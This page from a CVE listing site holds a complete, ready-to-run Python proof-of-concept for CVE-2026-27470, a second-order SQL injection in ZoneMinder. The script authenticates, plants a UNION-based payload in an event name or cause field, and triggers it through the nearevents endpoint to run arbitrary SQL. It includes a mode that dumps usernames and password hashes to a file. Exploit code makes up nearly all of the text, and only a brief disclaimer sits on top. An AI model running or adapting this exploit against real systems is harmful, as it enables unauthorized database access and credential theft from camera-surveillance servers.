5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in          : 1.36.38 / 1.38.1
Vulnerable file   : web/ajax/status.php -> getNearEvents()
Author            : d3vn0mi

LEGAL DISCLAIMER:
This tool is for educational and authorized security research purposes only.
Do not use against systems you do not own or have explicit written permission
to test.

Usage:
  python3 poc.py -t http://10.10.10.10 -u admin -p password
  python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
  python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o creds.txt
"""

import argparse
import logging
import os
import re
import sys
from datetime import datetime

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ---------------------------------------------------------------------------
# ANSI colors (no external deps)
# ---------------------------------------------------------------------------
class _C:
    GREEN  = "\033[92m"
    RED    = "\033[91m"
    YELLOW = "\033[93m"
    CYAN   = "\033[96m"
    BOLD   = "\033[1m"
    RESET  = "\033[0m"

# Disable colors when output is not a terminal
if not sys.stdout.isatty():
    for attr in ("GREEN", "RED", "YELLOW", "CYAN", "BOLD", "RESET"):
        setattr(_C, attr, "")


def _ok(msg):
    print(f"{_C.GREEN}[+]{_C.RESET} {msg}")

def _fail(msg):
    print(f"{_C.RED}[-]{_C.RESET} {msg}")

def _info(msg):
    print(f"{_C.YELLOW}[*]{_C.RESET} {msg}")


BANNER = f"""{_C.CYAN}{_C.BOLD}
╔══════════════════════════════════════════════════════════════╗
║   CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC         ║
║   CVSS 8.8 │ Authenticated │ Events Permission               ║
║                                                              ║
║   Author: d3vn0mi                                            ║
╚══════════════════════════════════════════════════════════════╝{_C.RESET}
"""

log = logging.getLogger("cve-2026-27470")

# ---------------------------------------------------------------------------
# Exit codes
# ---------------------------------------------------------------------------
EXIT_OK           = 0
EXIT_AUTH_FAIL    = 1
EXIT_NO_EVENTS    = 2
EXIT_INJECT_FAIL  = 3
EXIT_CONN_ERROR   = 4

# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------

def _extract_csrf(text):
    """Extract __csrf_magic token from page HTML."""
    m = re.search(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']', text)
    if m:
        return m.group(1)
    m2 = re.search(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']', text)
    if m2:
        return m2.group(1)
    return None


def _build_session(proxy=None, timeout=30):
    """Create a requests.Session with common defaults."""
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"
    })
    session.verify = False
    session._zm_csrf = None
    session._timeout = timeout
    if proxy:
        session.proxies = {"http": proxy, "https": proxy}
    return session


def _get(session, url, **kwargs):
    """Wrapper around session.get with timeout and error handling."""
    kwargs.setdefault("timeout", session._timeout)
    return session.get(url, **kwargs)


def _post(session, url, **kwargs):
    """Wrapper around session.post with timeout and error handling."""
    kwargs.setdefault("timeout", session._timeout)
    return session.post(url, **kwargs)

# ---------------------------------------------------------------------------
# Core functions
# ---------------------------------------------------------------------------

def login(session, target, username, password):
    """
    Authenticate to ZoneMinder and retrieve session cookie + CSRF token.
    If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session
    is initialized.
    """
    resp = _get(session, f"{target}/", allow_redirects=True)
    session._zm_csrf = _extract_csrf(resp.text)

    # Auth disabled — ZoneMinder redirects to the privacy page
    if "privacy" in resp.url:
        _info("ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
        return True

    # Auth enabled — send login POST
    data = {
        "view": "login",
        "action": "login",
        "username": username,
        "password": password,
    }
    if session._zm_csrf:
        data["__csrf_magic"] = session._zm_csrf

    resp2 = _post(session, f"{target}/index.php", data=data, allow_redirects=True)

    # Refresh CSRF token after login
    new_csrf = _extract_csrf(resp2.text)
    if new_csrf:
        session._zm_csrf = new_csrf

    if "logout" in resp2.text.lower() or "console" in resp2.url:
        return True

    if resp2.status_code in (200, 302):
        resp3 = _get(session, f"{target}/index.php?view=console", allow_redirects=True)
        if resp3.status_code == 200 and "login" not in resp3.url:
            return True

    return False


def get_event_id(session, target):
    """Retrieve any available event ID via the ZoneMinder status API."""
    params = {
        "request": "status",
        "entity": "events",
        "sort_field": "Id",
        "sort_asc": "1",
        "limit": "1",
    }
    resp = _get(session, f"{target}/index.php", params=params)
    try:
        data = resp.json()
        events = data.get("results", [])
        if events:
            return events[0].get("Id") or events[0].get("id")
    except Exception:
        log.debug("Failed to parse event list response: %s", resp.text[:200])
    return None


def inject_payload(session, target, event_id, payload, field="Name"):
    """
    Phase 1 — Write the malicious payload into the event Name or Cause field.
    ZoneMinder uses a parameterized query here so the payload is stored safely.
    """
    csrf = session._zm_csrf

    if field == "Name":
        data = {
            "request": "event",
            "action": "rename",
            "id": event_id,
            "eventName": payload,
        }
    else:  # Cause
        data = {
            "request": "event",
            "action": "edit",
            "id": event_id,
            "newEvent[Cause]": payload,
            "newEvent[Notes]": "poc",
        }

    if csrf:
        data["__csrf_magic"] = csrf

    resp = _post(session, f"{target}/index.php", data=data)
    log.debug("inject_payload response: %d %s", resp.status_code, resp.text[:200])
    return resp.status_code == 200


def trigger_sqli(session, target, event_id, field="Name"):
    """
    Phase 2 — Trigger second-order injection via getNearEvents().
    The stored payload is read from the DB and concatenated unsafely into SQL.
    """
    params = {
        "request": "status",
        "entity": "nearevents",
        "id": event_id,
        "sort_field": field,
        "sort_asc": "1",
    }
    return _get(session, f"{target}/index.php", params=params)


def restore_event_name(session, target, event_id, original_name="Event"):
    """Restore the event name to its original value after exploitation."""
    csrf = session._zm_csrf
    data = {
        "request": "event",
        "action": "rename",
        "id": event_id,
        "eventName": original_name,
    }
    if csrf:
        data["__csrf_magic"] = csrf
    _post(session, f"{target}/index.php", data=data)


def _parse_result(resp):
    """Extract the leaked value from the getNearEvents response."""
    try:
        data = resp.json()
        nearevents = data.get("nearevents", {})
        if nearevents:
            for key in ("NextEventId", "PrevEventId", "NextEventStartTime"):
                val = nearevents.get(key)
                if val:
                    return str(val)
        results = data.get("results", data.get("data", []))
        if results:
            val = results[0].get("Id") or results[0].get("StartDateTime")
            if val:
                return str(val)
        return str(data)
    except Exception:
        return resp.text[:500]


def run_exploit(target, username, password, sql_query, field="Name",
                restore=True, manual_event_id=None, proxy=None, timeout=30):
    """Execute one injection cycle and return the extracted value."""
    session = _build_session(proxy=proxy, timeout=timeout)

    _info(f"Target  : {target}")
    _info(f"User    : {username}")
    _info(f"Query   : {sql_query}")
    print()

    # Step 1 — Authenticate
    _info("Logging in...")
    try:
        if not login(session, target, username, password):
            _fail("Login failed. Check credentials.")
            sys.exit(EXIT_AUTH_FAIL)
    except requests.ConnectionError as exc:
        _fail(f"Connection error: {exc}")
        sys.exit(EXIT_CONN_ERROR)

    _ok("Session established.")

    # Step 2 — Get event ID
    if manual_event_id:
        event_id = manual_event_id
        _ok(f"Event ID (manual): {event_id}")
    else:
        _info("Looking for an event ID...")
        event_id = get_event_id(session, target)
        if not event_id:
            _fail("No events found. Specify one manually with --event-id.")
            sys.exit(EXIT_NO_EVENTS)
        _ok(f"Event ID: {event_id}")

    # Step 3 — Build UNION-based payload
    # Events.Name is varchar(64) — keep payloads under 63 chars
    # UNION SELECT requires 2 columns (Id, StartDateTime)
    union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"
    _info(f"Injecting payload into '{field}' field...")
    if not inject_payload(session, target, event_id, union_payload, field=field):
        _fail("Failed to write payload. Check permissions.")
        sys.exit(EXIT_INJECT_FAIL)
    _ok("Payload stored via parameterized query — looks clean in the DB.")

    # Step 4 — Trigger second-order injection
    _info("Triggering second-order injection...")
    resp = trigger_sqli(session, target, event_id, field=field)
    log.debug("trigger response: HTTP %d", resp.status_code)
    _info(f"HTTP {resp.status_code}")

    result = _parse_result(resp)

    # Step 5 — Cleanup
    if restore:
        restore_event_name(session, target, event_id)
        _info("Event name restored.")

    return result


def _write_output(filepath, content):
    """Append content to the output file."""
    with open(filepath, "a") as fh:
        fh.write(content)
    _ok(f"Results saved to {os.path.abspath(filepath)}")

# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main():
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
    )
    parser.add_argument("-t", "--target",   required=True,
                        help="Target URL (e.g. http://10.10.10.10)")
    parser.add_argument("-u", "--username", required=True,
                        help="ZoneMinder username")
    parser.add_argument("-p", "--password", required=True,
                        help="ZoneMinder password")
    parser.add_argument("--event-id",      type=int,
                        help="Event ID to use as injection carrier")
    parser.add_argument("--field",         default="Name",
                        choices=["Name", "Cause"],
                        help="Injection field (default: Name)")
    parser.add_argument("--query",         default="SELECT VERSION()",
                        help="SQL query to execute (default: SELECT VERSION())")
    parser.add_argument("--dump-users",    action="store_true",
                        help="Dump all usernames and password hashes")
    parser.add_argument("-o", "--output",  default=None,
                        help="Save results to file (default: dumped_creds.txt for --dump-users)")
    parser.add_argument("--no-restore",    action="store_true",
                        help="Do not restore the event name after exploitation")
    parser.add_argument("--proxy",         default=None,
                        help="HTTP proxy (e.g. http://127.0.0.1:8080)")
    parser.add_argument("--timeout",       type=int, default=30,
                        help="Request timeout in seconds (default: 30)")
    parser.add_argument("-v", "--verbose",  action="store_true",
                        help="Enable debug logging")

    args = parser.parse_args()
    target = args.target.rstrip("/")
    eid = args.event_id
    restore = not args.no_restore

    if args.verbose:
        logging.basicConfig(level=logging.DEBUG,
                            format="%(asctime)s %(name)s %(levelname)s: %(message)s")
    else:
        logging.basicConfig(level=logging.WARNING)

    common = dict(
        field=args.field,
        restore=restore,
        manual_event_id=eid,
        proxy=args.proxy,
        timeout=args.timeout,
    )

    if args.dump_users:
        output_path = args.output or "dumped_creds.txt"
        _info("Mode: User dump")

        count_result = run_exploit(
            target, args.username, args.password,
            "SELECT COUNT(*) FROM Users", **common,
        )
        print(f"\n{_C.BOLD}[+] User count: {count_result}{_C.RESET}\n")

        # Write header
        header = (
            f"# CVE-2026-27470 — ZoneMinder credential dump\n"
            f"# Target : {target}\n"
            f"# Date   : {datetime.utcnow().isoformat()}Z\n"
            f"# Format : username:hash\n\n"
        )
        with open(output_path, "w") as fh:
            fh.write(header)

        creds_found = 0
        for i in range(10):
            uname = run_exploit(
                target, args.username, args.password,
                f"SELECT Username FROM Users LIMIT {i},1", **common,
            )
            uname_str = str(uname) if uname else ""
            if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
                break

            passwd = run_exploit(
                target, args.username, args.password,
                f"SELECT Password FROM Users LIMIT {i},1", **common,
            )

            line = f"{uname}:{passwd}"
            _ok(f"User {i + 1}: {line}")
            with open(output_path, "a") as fh:
                fh.write(line + "\n")
            creds_found += 1

        if creds_found:
            print()
            _ok(f"{creds_found} credential(s) saved to {os.path.abspath(output_path)}")
        else:
            _fail("No credentials extracted.")

    else:
        result = run_exploit(
            target, args.username, args.password, args.query, **common,
        )
        print(f"\n{_C.BOLD}[+] Result: {result}{_C.RESET}\n")

        if args.output:
            _write_output(args.output, result + "\n")

    sys.exit(EXIT_OK)


if __name__ == "__main__":
    main()